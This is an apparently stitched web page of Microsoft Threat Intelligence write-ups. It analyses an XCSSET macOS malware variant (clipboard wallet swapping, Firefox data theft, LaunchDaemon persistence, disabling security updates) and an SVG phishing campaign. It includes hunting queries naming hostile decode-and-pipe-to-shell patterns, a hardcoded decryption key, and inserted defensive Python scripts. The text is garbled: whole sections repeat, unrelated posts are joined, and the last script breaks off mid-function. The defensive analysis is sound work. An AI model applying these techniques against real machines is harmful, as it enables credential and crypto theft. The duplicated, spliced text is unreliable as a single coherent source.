Enable potentially unwanted application (PUA) protection in block mode to automatically quarantine PUAs like adware. PUA blocking takes effect on endpoint clients after the next signature update or computer restart. PUA blocking takes effect on endpoint clients after the next signature update or computer restart.
Turn on network protection to block connections to malicious domains and IP addresses.
Microsoft Defender XDR detections
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.
Tactic
Observed activity
Microsoft Defender coverage
Initial access
– Malicious Xcode projects
Microsoft Defender Antivirus – Trojan:MacOS/XCSSET.PB
Microsoft Defender for Endpoint – Possible XCSSET activity
Microsoft Defender for Endpoint – Suspicious file dropped and launched – Suspicious script launched – Network connection by osascript – Suspicious process launched from a world-writable directory
Persistence
– Hidden LaunchDaemon persistence
Microsoft Defender Antivirus – Behavior:MacOS/SuspHiddenPersistence.A1
Microsoft Defender for Endpoint – Suspicious Plist modifications – Suspicious launchctl tool activity
Defense evasion
– Suspicious obfuscated command
Microsoft Defender for Endpoint – Suspicious file or information obfuscation detected
Credential access
– Use of modified HackBrowserData project
Microsoft Defender Antivirus – Trojan:MacOS/HackBrowserData.A
Impact
– Xcode project infection
Microsoft Defender Antivirus – Behavior:MacOS/XCSSET.A
Note: For detections associated with older variants of XCSSET, refer to our March 2025 blog post.
Threat intelligence reports
Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.
Microsoft Defender XDR customers can run the following query to find related activity in their networks:
Suspicious commands while building an Xcode project
Search for suspicious commands related to this XCSSET when an Xcode project is being built.
DeviceProcessEvents
| where ProcessCommandLine has_all("echo", "xxd -p -r", "| sh") or ProcessCommandLine has_all("echo", "base64 -d", "| sh")
| where InitiatingProcessFileName has_any ("sh", "bash", "zsh")
| where InitiatingProcessCommandLine contains "/Developer/Xcode/DerivedData"
Suspicious commands executed by XCSSET info-stealer module
Search for suspicious commands related to decryption logic of data received from C2.
DeviceProcessEvents
| where ProcessCommandLine has_any ("base64 --decode", "base64 -d") and ProcessCommandLine has_all ("openssl enc -d", "cut -c1-32")
Suspicious application creation
Search for suspicious applications created in Temp folder by this XCSSET.
DeviceFileEvents
| where FolderPath matches regex @"/tmp/[a-zA-Z]\.app"
Microsoft Sentinel
Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
Microsoft Threat Intelligence has identified yet another XCSSET variant in the wild that introduces further updates and new modules beyond those detailed in our March 2025 blog post. The XCSSET malware is designed to infect Xcode projects, typically used by software developers, and run while an Xcode project is being built. We assess that this mode of infection and propagation banks on project files being shared among developers building Apple or macOS-related applications.
This new variant of XCSSET brings key changes related to browser targeting, clipboard hijacking, and persistence mechanisms. It employs sophisticated encryption and obfuscation techniques, uses run-only compiled AppleScripts for stealthy execution, and expands its data exfiltration capabilities to include Firefox browser data. It also adds another persistence mechanism through LaunchDaemon entries.
This variant features a submodule designed to monitor the clipboard and references a downloaded configuration file containing address regex patterns associated with various digital wallets. If a pattern match is detected, XCSSET is capable of substituting the clipboard content with its own predefined set of wallet addresses.
In this blog, we will discuss the new modules added to the XCSSET’s inventory and key changes to existing ones. While we’re only seeing this new XCSSET variant in limited attacks as of this writing, we’re publishing our comprehensive analysis to increase awareness of this evolving threat. We shared these findings with Apple and collaborated with GitHub to take down repositories affected by XCSSET. This work reflects our broader commitment to disrupting attacks and dismantling attacker operations. Alongside our findings, we are sharing actionable detections, recommendations, and best practices to help organizations defend against this threat with confidence.
Analysis
The latest XCSSET variant follows a four-stage infection chain. The initial three stages are consistent with those observed in previous variants, as described in our previous blog. This analysis begins with the fourth stage, which includes the boot() function and its associated calls to download and run submodules.
boot() function of the fourth-stage script
The new variant introduces modifications to the boot() function. These include additional checks for the Firefox browser and modified logic for the Telegram existence check. This stage also downloads and executes multiple new modules.
Older variant:
Figure 1. boot() function of the earlier variant
New variant:
Figure 2. boot() function of the latest version
In the following sections, we examine changes to existing submodules as well as additional modules in this variant.
vexyeqj [Older variant: seizecj] (Info-stealer)
In comparison to the previous variant, several commands in this script are commented out. Additionally, it downloads a module called bnk, which is executed using osascript, with the domain supplied as a parameter. It then waits for three seconds and deletes the downloaded file.
Figure 3. Main logic of the Info-stealer submodule
The bnk file is a run-only compiled AppleScript. Direct decompilation of run-only compiled AppleScript is generally considered challenging or not feasible; however, the AppleScript disassembler project on GitHub can be used to disassemble the code for analysis.
The script defines several functions for purposes such as data validation, encryption, decryption, obtaining additional data from command and control (C2), and logging. The script is executed with the domain as its parameter.
Figure 4. Disassembled code of the dec() function
Above is a code snippet of the dec() function, which is used to decrypt the data received from the C2 server. Parsing the above leads to the command:
In the referenced code, the encrypted data is stored in the variable in. The first 32 characters of this variable are extracted to serve as the initialization vector (IV). The remaining data is then Base64-decoded and provided to the AES decryption function. In this case, the decryption key is a predefined constant, 27860c1670a8d2f3de7bbc74cd754121, which was established and computed within the main function.
The decoded blob appears to be a configuration file. Presented below is a formatted and redacted sample of the decrypted response obtained from the C2 server:
Figure 5. Configuration data received from the C2 server
The following section examines the core logic of the downloaded bnk payload, explaining how the previous information is interpreted and applied.
Firstly, it calls a defined function to obtain the configuration data from the C2 server; this data is decrypted and stored in a variable. Shell commands are executed to retrieve the SerialNumber and the current user.
The clipboard content is then retrieved, which we determined by inspecting the AEVT (Apple Event) codes. The process identifies the frontmost application and checks it against a blocklist defined by the “bad” property in the C2 response. Processing proceeds only if the current clipboard data differs from both the last clipboard entry and the last replaced clipboard data, the clipboard data is longer than 25 characters, and the oD() function does not return true; oD() returns true when the first four characters are digits. After these checks come multiple gates and conditions. The first condition checks whether the clipboard length is strictly between 50 and 300 characters. It then checks whether the clipboard matches the pattern defined in the s record of the response. If it matches, the clipboard data is formatted as a record-type string and exfiltrated to the C2 server; the transmitted data is also AES-encrypted.
In the second condition, the script verifies whether the clipboard length is between 25 and 65, whether it was executed with a single argument, and whether the cD(clipboard_data) function returns a value greater than 1 (cD() returns the count of digits in its argument). If these conditions are met, the script iterates through the sub collection in the C2 response, which includes individual entries for various wallets. Each sub collection entry contains:
a: Contains a list of addresses from which one is selected; the corresponding clipboard data is subsequently replaced.
t: Refers to the wallet identifier.
r: Specifies the regex pattern used for matching addresses associated with this wallet.
ir (optional): Represents a negative regex pattern; addresses matching this pattern should be excluded.
p: Appears to function as a counter or record index.
For each record, it matches the clipboard content against the r and ir patterns. If r matches and ir does not, the program checks whether the clipboard content already matches one of the attacker’s addresses. If it does not, it selects an address from the list and replaces the clipboard’s content accordingly. The script then sends information, including the original clipboard data, the replaced data, the wallet name, the frontmost application, and other relevant details, to the C2 server. Next, it assigns the value of the clipboard data to the xcP variable, which tracks the most recently replaced clipboard entry. Finally, it updates the xP variable to reflect the current clipboard text, waits for two seconds, and repeats the loop.
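The gating logic above, turned around to the defender's side, as an added example that is not part of the original post: a small Python monitor replays a sequence of clipboard snapshots and flags the transition this submodule produces, where a wallet-looking string is replaced within the malware's two-second polling window by a different string of the same wallet kind. The wallet regexes and the timeline are constructed placeholders, not the patterns from the actor's configuration.

```python
import re
from dataclasses import dataclass

# Constructed wallet patterns in the shape of the C2 config's sub entries
# (t = wallet identifier, r = match regex, ir = optional exclusion regex).
# Illustrative placeholders only, not the patterns from the actor's config.
WALLET_PATTERNS = [
    {"t": "btc", "r": r"^(1|3|bc1)[A-Za-z0-9]{25,61}$", "ir": None},
    {"t": "eth", "r": r"^0x[0-9a-fA-F]{40}$", "ir": None},
    {"t": "trx", "r": r"^T[A-Za-z0-9]{33}$", "ir": None},
]


def classify(text):
    """Return the wallet identifier whose r matches and whose ir (if any) does not."""
    for entry in WALLET_PATTERNS:
        if not re.fullmatch(entry["r"], text):
            continue
        if entry["ir"] and re.search(entry["ir"], text):
            continue
        return entry["t"]
    return None


def xcsset_would_consider(text):
    """Preconditions the post describes for the replacement branch: length between
    25 and 65, more than one digit (cD), and not starting with four digits (oD)."""
    digits = sum(c.isdigit() for c in text)
    return 25 <= len(text) <= 65 and digits > 1 and not text[:4].isdigit()


@dataclass
class Snapshot:
    at: float   # seconds since the monitor started
    text: str


def detect_substitutions(snapshots, max_gap=5.0):
    """Flag transitions where a wallet-like string is replaced by a different
    string of the same wallet kind within max_gap seconds. The malware polls every
    two seconds, so a swap shows up as a near-immediate change rather than a
    user-driven copy minutes later. Returns (wallet, original, replacement) tuples."""
    alerts = []
    for prev, cur in zip(snapshots, snapshots[1:]):
        before, after = prev.text.strip(), cur.text.strip()
        if before == after or not xcsset_would_consider(before):
            continue
        kind = classify(before)
        if kind is None or classify(after) != kind:
            continue
        if cur.at - prev.at <= max_gap:
            alerts.append((kind, before, after))
    return alerts


# Constructed clipboard timeline: the user copies an address and, within the
# polling window, the clipboard holds a different address of the same kind.
ETH_ORIGINAL = "0x" + "a1b2c3d4" * 5
ETH_SWAPPED = "0x" + "deadbeef00" * 4
BTC_ORIGINAL = "1ConstructedSampleAddress0000000001"
BTC_SWAPPED = "3AnotherConstructedSampleAddr000002"
SAMPLE_TIMELINE = [
    Snapshot(0.0, "meeting notes for Monday"),
    Snapshot(3.0, ETH_ORIGINAL),
    Snapshot(4.5, ETH_SWAPPED),        # swapped 1.5 s later: alert
    Snapshot(20.0, ETH_SWAPPED),       # unchanged: ignored
    Snapshot(30.0, BTC_ORIGINAL),
    Snapshot(32.0, BTC_SWAPPED),       # swapped 2 s later: alert
    Snapshot(60.0, ETH_ORIGINAL),
    Snapshot(90.0, ETH_SWAPPED),       # 30 s later: outside the window, ignored
]

if __name__ == "__main__":
    for wallet, before, after in detect_substitutions(SAMPLE_TIMELINE):
        print(f"[{wallet}] clipboard changed from {before} to {after}")
```

A real deployment would feed the monitor from the system pasteboard on a short timer; the heuristic is deliberately narrow (same wallet kind, different value, seconds apart) to keep ordinary copy-paste of two addresses minutes apart out of the alert stream.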
neq_cdyd_ilvcmwx (File-stealer)
This module retrieves an additional script from the C2 server, which is saved in the /tmp/ directory. The script is subsequently executed with the domain and moduleName provided as parameters. After execution, the downloaded file is deleted. The module operates as a compiled, run-only AppleScript. The script bears similarity to the txzx_vostfdi module, previously identified as a digital wallet data stealer targeting browsers. During analysis, the C2 server did not supply a folder list; however, it is capable of exfiltrating files back to the C2 server.
Figure 6. Additional script being downloaded and executed
xmyyeqjx (LaunchDaemon-based persistence)
This submodule sets up LaunchDaemon persistence for the ~/.root file, which is created in this module. Here’s a summary of the script:
The process begins by creating several paths and a ~/.root file in the user’s HOME directory, which will contain the payload. The payload performs the following actions:
Changes the directory to /Users/Shared
Checks the network connection
Retrieves the local signed-in user
Sleeps for 30 seconds
Executes the ~/.zshrc file in the context of the signed-in user (.zshrc file was appended with malicious payload in previous submodules)
Sleeps for 30 seconds
Modifies two configurations to execute system commands that disable macOS automatic configuration updates and Rapid Security Response mechanisms.
These commands modify macOS Software Update preferences to disable various critical Apple Updates, including Rapid Security Responses (RSR), Security Configuration updates, and others.
It then calls the doMainFunc() function.
Figure 7. Creation of fake application and downloading of additional script from C2 server.
This function first checks for the existence of a LaunchDaemon entry whose contents reference the .root file. If none is found, it downloads another script from the C2 server, again a run-only compiled AppleScript. It then creates a fake application named System Settings.app in the /tmp directory, which simply executes the downloaded AppleScript with two parameters. These parameters appear to be the Label/plist name and the file to be persisted (the ~/.root file). After creating the fake app, it calls another function that waits for the legitimate System Settings application to start, upon which it executes the fake application. This is done so that the activity masquerades as legitimate.
The downloaded script first gets the device’s serial number and the current username by executing shell commands. It then forms the path to the LaunchDaemon plist file and constructs its content. It uses the echo command to write this constructed content to the LaunchDaemon file; the file name is the name passed in the argument. Below is an example of the created plist file:
Figure 8. Plist content of the created LaunchDaemon entry
The plist name masquerades as a legitimate entry with the prefix com.google., and the daemon executes the ~/.root file using bash. The echo command is run using “do shell script … with administrator privileges”, which can be inferred from the badm AEVT code. It then executes the chown command to change the owner to root:wheel and sets 644 permissions on the plist file. Lastly, it executes launchctl load -w with sudo to start the daemon.
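An added example, not code from the original post, that turns the plist characteristics described above into an audit: it parses LaunchDaemon plists with plistlib and reports a vendor-style label whose program is not installed under a vendor path, an interpreter launched directly, and a hidden dotfile in a user's home directory. The two plists are constructed to illustrate the shape; the real Figure 8 content is not reproduced.

```python
import plistlib
import re
import sys
from pathlib import Path

# Constructed LaunchDaemon plist modelled on the behaviour described above (a
# com.google.-style label, bash invoking a hidden file in a user's home). It is
# an illustration of the shape, not the actual Figure 8 content.
SUSPICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.google.exampleagent</string>
  <key>ProgramArguments</key>
  <array>
    <string>/bin/bash</string>
    <string>/Users/jdoe/.root</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict>
</plist>"""

# Constructed benign counterpart: a label whose program lives under /Library.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.backupagent</string>
  <key>ProgramArguments</key>
  <array><string>/Library/Example/backupagent</string><string>--daemon</string></array>
  <key>RunAtLoad</key><true/>
</dict>
</plist>"""

INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python3", "perl"}
HIDDEN_IN_HOME = re.compile(r"^(?:/Users/[^/]+|~)/\.[^/]+")
# Locations where a vendor-prefixed daemon would normally keep its program.
VENDOR_PATHS = ("/Library/", "/Applications/", "/usr/", "/System/", "/opt/")


def audit_daemon(plist_bytes, filename=None):
    """Return a list of findings for one LaunchDaemon plist; empty means nothing stood out."""
    findings = []
    data = plistlib.loads(plist_bytes)
    label = str(data.get("Label", ""))
    args = [str(a) for a in data.get("ProgramArguments", [])]
    if not args and "Program" in data:
        args = [str(data["Program"])]
    if args and Path(args[0]).name in INTERPRETERS:
        findings.append("interpreter launched directly: " + " ".join(args))
    for arg in args:
        if HIDDEN_IN_HOME.match(arg):
            findings.append("hidden dotfile in a user home directory: " + arg)
    # A root daemon whose label borrows a vendor prefix but whose program is not
    # installed under a vendor location is the masquerade described in the post.
    if re.match(r"^com\.(apple|google|microsoft)\.", label) and args \
            and not args[0].startswith(VENDOR_PATHS):
        findings.append(f"vendor-style label {label!r} runs program outside vendor paths: {args[0]}")
    if filename and label and Path(filename).stem != label:
        findings.append(f"label {label!r} does not match file name {filename!r}")
    return findings


def scan_directory(directory="/Library/LaunchDaemons"):
    """Audit every plist in a LaunchDaemons directory; returns {filename: findings}."""
    results = {}
    for path in sorted(Path(directory).glob("*.plist")):
        try:
            findings = audit_daemon(path.read_bytes(), path.name)
        except (plistlib.InvalidFileException, ValueError) as exc:
            findings = [f"unparseable plist: {exc}"]
        if findings:
            results[path.name] = findings
    return results


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "/Library/LaunchDaemons"
    for name, found in scan_directory(target).items():
        print(name)
        for item in found:
            print("  -", item)
```

Run it as root on a macOS host to cover every daemon plist; pairing the output with the ownership and 644 permissions the post describes (a freshly written file with an old vendor-style name) narrows the review to a handful of entries.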
jey [Older Variant: jez] (Git-based persistence)
The command in the older variant executes a direct concatenation of the encrypted payload along with the repeated decryption command directly through the shell. In the new variant, the decryption logic is encapsulated within a shell function, which is defined inline and then used to decrypt the encrypted string before passing it to the shell for execution. This change primarily enhances the obfuscation method used by the malware.
Old logic:
Figure 9. Payload generation logic in older variant
New logic:
Figure 10. Payload generation logic in the latest variant
iewmilh_cdyd (Info-stealer targeting Firefox)
This new variant adds an info-stealer module to exfiltrate data stored by Firefox. The runMe() function is invoked first to download, from the C2 server, a Mach-O FAT binary that is responsible for all info-stealing operations.
Figure 11. Downloading compiled binary of the HackBrowserData project
This downloaded binary appears to be a modified version of the HackBrowserData GitHub project, which is capable of decrypting and exporting browser data stored by browsers. Passwords, history, credit card information, and cookies are some of the key information it can extract from almost all popular browsers.
Upon download, the binary is given executable file permissions, is ad-hoc signed on the victim’s machine, and is executed with -b firefox -f json --dir " & resDir & " --zip as arguments:
-b: Browser name
-f: Format of the output data
--dir: Export directory where the output is stored
--zip: Stores the output in a compressed ZIP
Once all the data is retrieved, it uploads the compressed ZIP and log file to the C2 server using its old method of exfiltrating data in chunks.
Mitigation and protection guidance
Defenders can take the following mitigation steps to defend against this threat:
Run the latest version of your operating systems and applications. Deploy the latest security updates as soon as they become available.
Always inspect and verify Xcode projects downloaded or cloned from repositories, as the malware usually spreads through infected projects.
Exercise caution when copying and pasting sensitive data from the clipboard. Always verify that the pasted content matches the intended source to avoid falling victim to clipboard hijacking or data tampering attacks.
Encourage users to use web browsers that support Microsoft Defender SmartScreen like Microsoft Edge—available on macOS and various platforms—which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware.
Microsoft Defender for Endpoint customers can also apply the following mitigations to reduce the environmental attack surface and mitigate the impact of this threat and its payloads:
Turn on cloud-delivered protection and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.
Enable potentially unwanted application (PUA) protection in block mode to automatically quarantine PUAs like adware. PUA blocking takes effect on endpoint clients after the next signature update or computer restart.
Turn on network protection to block connections to malicious domains and IP addresses.
Microsoft Defender XDR detections
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.
| Tactic | Observed activity | Microsoft Defender coverage |
| --- | --- | --- |
| Initial access | Malicious Xcode projects | Microsoft Defender Antivirus: Trojan:MacOS/XCSSET.PB. Microsoft Defender for Endpoint: Possible XCSSET activity; Suspicious file dropped and launched; Suspicious script launched; Network connection by osascript; Suspicious process launched from a world-writable directory |
| Persistence | Hidden LaunchDaemon persistence | Microsoft Defender Antivirus: Behavior:MacOS/SuspHiddenPersistence.A1. Microsoft Defender for Endpoint: Suspicious Plist modifications; Suspicious launchctl tool activity |
| Defense evasion | Suspicious obfuscated command | Microsoft Defender for Endpoint: Suspicious file or information obfuscation detected |
| Credential access | Use of modified HackBrowserData project | Microsoft Defender Antivirus: Trojan:MacOS/HackBrowserData.A |
| Impact | Xcode project infection | Microsoft Defender Antivirus: Behavior:MacOS/XCSSET.A |
Note: For detections associated with older variants of XCSSET, refer to our March 2025 blog post.
Threat intelligence reports
Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.
Microsoft Defender XDR customers can run the following queries to find related activity in their networks:
Suspicious commands while building an Xcode project
Search for suspicious commands related to this XCSSET variant when an Xcode project is being built.
DeviceProcessEvents
| where ProcessCommandLine has_all("echo", "xxd -p -r", "| sh") or ProcessCommandLine has_all("echo", "base64 -d", "| sh")
| where InitiatingProcessFileName has_any ("sh", "bash", "zsh")
| where InitiatingProcessCommandLine contains "/Developer/Xcode/DerivedData"
Suspicious commands executed by XCSSET info-stealer module
Search for suspicious commands related to decryption logic of data received from C2.
DeviceProcessEvents
| where ProcessCommandLine has_any ("base64 --decode", "base64 -d") and ProcessCommandLine has_all ("openssl enc -d", "cut -c1-32")
Suspicious application creation
Search for suspicious applications created in the /tmp folder by this XCSSET variant.
DeviceFileEvents
| where FolderPath matches regex @"/tmp/[a-zA-Z]\.app"
Microsoft Sentinel
Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
Microsoft Threat Intelligence recently detected and blocked a credential phishing campaign that likely used AI-generated code to obfuscate its payload and evade traditional defenses. Appearing to be aided by a large language model (LLM), the activity obfuscated its behavior within an SVG file, leveraging business terminology and a synthetic structure to disguise its malicious intent. In analyzing the malicious file, Microsoft Security Copilot assessed that the code was “not something a human would typically write from scratch due to its complexity, verbosity, and lack of practical utility.”
Like many transformative technologies, AI is being adopted by both defenders and cybercriminals. While defenders use AI to detect, analyze, and respond to threats at scale, attackers are experimenting with AI to enhance their own operations, such as by crafting more convincing lures, automating obfuscation, and generating code that mimics legitimate content. Even though the campaign in this case was limited in nature and primarily aimed at US-based organizations, it exemplifies a broader trend of attackers leveraging AI to increase the effectiveness and stealth of their operations. This case also underscores the growing need for defenders to understand and anticipate AI-driven threats.
Despite the sophistication of the obfuscation, the campaign was successfully detected and blocked by Microsoft Defender for Office 365’s AI-powered protection systems, which analyze signals across infrastructure, behavior, and message context that remain largely unaffected by an attacker’s use of AI. By sharing our analysis, we aim to help the security community recognize similar tactics being used by threat actors and reinforce that AI-enhanced threats, while evolving, are not undetectable. As we discuss in this post, an attacker’s use of AI often introduces new artifacts that can be leveraged for detection. By applying these insights and our recommended best practices, organizations can strengthen their own defenses against similar emerging, AI-aided phishing campaigns.
Phishing campaign tactics and payload
On August 18, Microsoft Threat Intelligence detected a phishing campaign leveraging a compromised small business email account to distribute malicious phishing emails intended to steal credentials. The attackers employed a self-addressed email tactic, where the sender and recipient addresses matched and the actual targets were hidden in the BCC field, in an attempt to bypass basic detection heuristics. The content of the email was crafted to resemble a file-sharing notification, containing the message:
Figure 1. Phishing email example
Attached to the email was a file named 23mb – PDF- 6 pages.svg, designed to look like a legitimate PDF document even though the file extension indicates it is an SVG file. SVG files (Scalable Vector Graphics) are attractive to attackers because they are text-based and scriptable, allowing them to embed JavaScript and other dynamic content directly within the file. This makes it possible to deliver interactive phishing payloads that appear benign to both users and many security tools. Additionally, SVGs support obfuscation-friendly features such as invisible elements, encoded attributes, and delayed script execution, all of which can be used to evade static analysis and sandboxing.
When opened, the SVG file redirected the user to a webpage that prompted them to complete a CAPTCHA for security verification, a common social engineering tactic used to build trust and delay suspicion. Although our visibility for this incident was limited to the initial landing page due to the activity being detected and blocked, the campaign would very likely have presented a fake sign-in page after the CAPTCHA to harvest credentials.
Figure 2. Security verification prompt
An analysis of the SVG code found that it used a unique method of obfuscating its content and behavior. Instead of using cryptographic obfuscation, which is commonly used to obfuscate phishing content, the SVG code in this campaign used business-related language to disguise its malicious activity. It did this in two ways:
First, the beginning of the SVG code was structured to look like a legitimate business analytics dashboard. It contained elements for a supposed Business Performance Dashboard, including chart bars and month labels. These elements, however, were rendered completely invisible to the user by setting their opacity to zero and their fill to transparent. This tactic is designed to mislead anyone casually inspecting the file, making it appear as if the SVG’s sole purpose is to visualize business data. In reality, though, it’s a decoy.
Figure 3. SVG code containing decoy business performance chart
Second, the payload’s functionality was also hidden using a creative use of business terms. Within the file, the attackers encoded the malicious payload using a long sequence of business-related terms. Words like revenue, operations, risk, or shares were concatenated into a hidden data-analytics attribute of an invisible <text> element within the SVG.
Figure 4. Sequence of business-related terms
The terms in this attribute were later used by embedded JavaScript, which systematically processed the business-related words through several transformation steps. Instead of directly including malicious code, the attackers encoded the payload by mapping pairs or sequences of these business terms to specific characters or instructions. As the script runs, it decodes the sequence, reconstructing the hidden functionality from what appears to be harmless business metadata. This obfuscated functionality included redirecting a user’s browser to the initial phishing landing page, triggering browser fingerprinting, and initiating session tracking.
Figure 5. Conversion of business terminology to processable malicious code
Using AI to analyze the campaign
Microsoft Threat Intelligence recently detected and blocked a credential phishing campaign that likely used AI-generated code to obfuscate its payload and evade traditional defenses. Appearing to be aided by a large language model (LLM), the activity obfuscated its behavior within an SVG file, leveraging business terminology and a synthetic structure to disguise its malicious intent. In analyzing the malicious file, Microsoft Security Copilot assessed that the code was “not something a human would typically write from scratch due to its complexity, verbosity, and lack of practical utility.”
Like many transformative technologies, AI is being adopted by both defenders and cybercriminals. While defenders use AI to detect, analyze, and respond to threats at scale, attackers are experimenting with AI to enhance their own operations, such as by crafting more convincing lures, automating obfuscation, and generating code that mimics legitimate content. Even though the campaign in this case was limited in nature and primarily aimed at US-based organizations, it exemplifies a broader trend of attackers leveraging AI to increase the effectiveness and stealth of their operations. This case also underscores the growing need for defenders to understand and anticipate AI-driven threats.
Despite the sophistication of the obfuscation, the campaign was successfully detected and blocked by Microsoft Defender for Office 365’s AI-powered protection systems, which analyze signals across infrastructure, behavior, and message context that remain largely unaffected by an attacker’s use of AI. By sharing our analysis, we aim to help the security community recognize similar tactics being used by threat actors and reinforce that AI-enhanced threats, while evolving, are not undetectable. As we discuss in this post, an attacker’s use of AI often introduces new artifacts that can be leveraged for detection. By applying these insights and our recommended best practices, organizations can strengthen their own defenses against similar emerging, AI-aided phishing campaigns.
Phishing campaign tactics and payload
On August 18, Microsoft Threat Intelligence detected a phishing campaign leveraging a compromised small business email account to distribute malicious phishing emails intended to steal credentials. The attackers employed a self-addressed email tactic, where the sender and recipient addresses matched, and actual targets were hidden in the BCC field, which is done to attempt to bypass basic detection heuristics. The content of the email was crafted to resemble a file-sharing notification, containing the message:
Figure 1. Phishing email example
Attached to the email was a file named 23mb – PDF- 6 pages.svg, designed to look like a legitimate PDF document even though the file extension indicates it is an SVG file. SVG files (Scalable Vector Graphics) are attractive to attackers because they are text-based and scriptable, allowing them to embed JavaScript and other dynamic content directly within the file. This makes it possible to deliver interactive phishing payloads that appear benign to both users and many security tools. Additionally, SVGs support obfuscation-friendly features such as invisible elements, encoded attributes, and delayed script execution, all of which can be used to evade static analysis and sandboxing.
When opened, the SVG file redirected the user to a webpage that prompted them to complete a CAPTCHA for security verification, a common social engineering tactic used to build trust and delay suspicion. Although our visibility for this incident was limited to the initial landing page due to the activity being detected and blocked, the campaign would have very likely presented a fake sign in page after the CAPTCHA to harvest credentials.
Figure 2. Security verification prompt
An analysis of the SVG code found that it used a unique method of obfuscating its content and behavior. Instead of using cryptographic obfuscation, which is commonly used to obfuscate phishing content, the SVG code in this campaign used business-related language to disguise its malicious activity. It did this in two ways:
First, the beginning of the SVG code was structured to look like a legitimate business analytics dashboard. It contained elements for a supposed Business Performance Dashboard, including chart bars and month labels. These elements, however, were rendered completely invisible to the user by setting their opacity to zero and their fill to transparent. This tactic is designed to mislead anyone casually inspecting the file, making it appear as if the SVG’s sole purpose is to visualize business data. In reality, though, it’s a decoy.
Figure 3. SVG code containing decoy business performance chart
Second, the payload’s functionality was also hidden using a creative use of business terms. Within the file, the attackers encoded the malicious payload using a long sequence of business-related terms. Words like revenue, operations, risk, or shares were concatenated into a hidden data-analytics attribute of an invisible <text> element within the SVG.
Figure 4. Sequence of business-related terms
The terms in this attribute were later used by embedded JavaScript, which systematically processed the business-related words through several transformation steps. Instead of directly including malicious code, the attackers encoded the payload by mapping pairs or sequences of these business terms to specific characters or instructions. As the script runs, it decodes the sequence, reconstructing the hidden functionality from what appears to be harmless business metadata. This obfuscated functionality included redirecting a user’s browser to the initial phishing landing page, triggering browser fingerprinting, and initiating session tracking.
Figure 5. Conversion of business terminology to processable malicious code
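The traits described above (an XML declaration, a CDATA-wrapped script, elements hidden with zero opacity or a transparent fill, a long word sequence parked in a data-* attribute of an invisible element, dynamic function creation, a navigation redirect, and identifiers with hexadecimal suffixes) are all visible to a static parser before any script runs. The following is an added example of such a triage pass, written for this page; it is not Microsoft's detection logic. Both SVG inputs are constructed and harmless: the "payload" in the sample is a word list, the script never runs, and the thresholds (eight words for a hidden attribute, three findings for a verdict) are assumptions to tune against your own attachment corpus.

```python
"""Static triage of an SVG attachment for script-bearing, hidden-content traits.
Added example, not Defender for Office 365 logic; sample SVGs are constructed."""
import re
import xml.etree.ElementTree as ET

SAMPLE_SVG = """<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" width="600" height="400">
  <text x="20" y="30" opacity="0">Business Performance Dashboard</text>
  <rect x="40" y="100" width="30" height="200" fill="transparent" opacity="0"/>
  <text id="metrics" opacity="0"
        data-analytics="revenue operations risk shares revenue growth margin risk operations shares revenue">Q1</text>
  <script type="text/javascript"><![CDATA[
    // Advanced business intelligence data processor
    function processBusinessMetricsf43e08(src) { return src.split(" "); }
    var terms = processBusinessMetricsf43e08(
        document.getElementById("metrics").getAttribute("data-analytics"));
    var run = new Function("t", "return t;");
    window.location = run(terms.join(""));
  ]]></script>
</svg>
"""

BENIGN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <rect x="10" y="10" width="80" height="80" fill="#336699"/>
  <text x="20" y="55">Logo</text>
</svg>
"""

SCRIPT_PATTERNS = [
    ("dynamic_function_creation", re.compile(r"\bnew\s+Function\s*\(|\beval\s*\(")),
    ("navigation_redirect", re.compile(r"\blocation\b")),
]
IDENTIFIER = re.compile(r"\b[A-Za-z_]\w*\b")
# descriptive name followed by a hex run, e.g. parseDataFormatf19e04
HEX_SUFFIXED = re.compile(r"[A-Za-z]{4,}([0-9a-f]{4,})")


def _local(tag):
    """Strip the XML namespace from an element tag ({ns}script -> script)."""
    return tag.rsplit("}", 1)[-1]


def _invisible(el):
    """True when the element is rendered invisible via attribute or inline style."""
    style = el.get("style", "").replace(" ", "")
    return (el.get("opacity") == "0" or el.get("fill") == "transparent"
            or el.get("visibility") == "hidden"
            or "opacity:0" in style or "display:none" in style)


def _hex_suffixed(ident):
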